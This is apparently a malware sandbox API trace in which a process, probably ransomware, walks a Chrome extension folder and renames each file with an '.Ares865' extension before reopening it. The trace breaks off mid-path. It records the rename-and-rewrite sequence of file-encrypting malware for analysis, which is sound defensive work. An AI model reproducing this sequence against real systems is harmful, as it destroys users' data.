[0100.033] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a10 [0100.033] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions" [0100.034] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" [0100.034] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0" [0100.035] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.Ares865") returned 154 [0100.035] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.ares865"), dwFlags=0x1) returned 1 [0100.036] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.036] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=573631) returned 1 [0100.068] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.Ares865") returned 164 [0100.068] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.ares865"), dwFlags=0x1) returned 1 [0100.070] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.070] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=43164) returned 1 [0100.075] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.Ares865") returned 163 [0100.075] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.ares865"), dwFlags=0x1) returned 1 [0100.076] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.077] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=98730) returned 1 [0100.087] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.Ares865") returned 167 [0100.087] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.ares865"), dwFlags=0x1) returned 1 [0100.088] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.088] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=70113) returned 1 [0100.097] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.Ares865") returned 165 [0100.097] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.ares865"), dwFlags=0x1) returned 1 [0100.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.099] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=238168) returned 1 [0100.117] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.Ares865") returned 158 [0100.118] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.ares865"), dwFlags=0x1) returned 1 [0100.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.119] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=52759) returned 1 [0100.127] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.Ares865") returned 153 [0100.127] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.ares865"), dwFlags=0x1) returned 1 [0100.132] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.132] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=51320) returned 1 [0100.140] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.Ares865") returned 156 [0100.140] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.ares865"), dwFlags=0x1) returned 1 [0100.141] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.141] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3110) returned 1 [0100.144] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.Ares865") returned 157 [0100.144] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.ares865"), dwFlags=0x1) returned 1 [0100.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.146] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14504) returned 1 [0100.149] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.Ares865") returned 162 [0100.149] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.ares865"), dwFlags=0x1) returned 1 [0100.151] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.151] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11040) returned 1 [0100.155] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.Ares865") returned 157 [0100.155] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.ares865"), dwFlags=0x1) returned 1 [0100.156] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.156] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2296) returned 1 [0100.160] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.Ares865") returned 164 [0100.160] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.ares865"), dwFlags=0x1) returned 1 [0100.161] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.161] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=286777) returned 1 [0100.181] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.Ares865") returned 171 [0100.182] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.ares865"), dwFlags=0x1) returned 1 [0100.183] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.183] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=31795) returned 1 [0100.187] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.Ares865") returned 163 [0100.187] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user 